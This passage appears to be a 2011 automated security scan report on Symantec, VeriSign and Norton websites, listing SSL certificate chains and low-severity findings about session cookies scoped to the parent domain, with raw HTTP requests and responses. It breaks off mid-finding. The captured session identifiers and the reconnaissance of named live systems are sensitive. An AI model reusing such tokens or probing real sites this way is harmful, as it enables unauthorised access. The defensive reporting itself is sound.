Confidence: Certain
Host: https://www-secure.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: www-secure.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Fri Oct 08 18:00:00 GMT-06:00 2010 Valid to: Mon Oct 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.36. https://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: www.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue May 25 18:00:00 GMT-06:00 2010 Valid to: Fri May 25 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.37. https://www4.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www4.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: www4.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Nov 18 18:00:00 GMT-06:00 2010 Valid to: Sat Nov 19 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9. Cookie scoped to parent domain
There are 82 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
9.1. http://buy.norton.com/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/redirector/e...[SNIP]...
9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:44 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 54738 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:47 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 52186 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:49 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 48409 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:52 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 63835 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.6. http://buy.norton.com/estore/mf/landingProductFeatures
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/landingProductFeatures
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]...
9.7. http://buy.norton.com/estore/mf/landingPromotion
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/landingPromotion
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingPromotion HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:32 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 50623 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:58 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 68924 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:02 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 73974 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.10. http://buy.norton.com/estore/mf/upgradeCenter
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/upgradeCenter
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeCenter HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:30 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 137137 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.11. http://buy.norton.com/estore/mf/upgradeRenewal
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/mf/upgradeRenewal
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Summary
Severity: Low
Confidence: Firm
Host: http://buy.norton.com
Path: /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
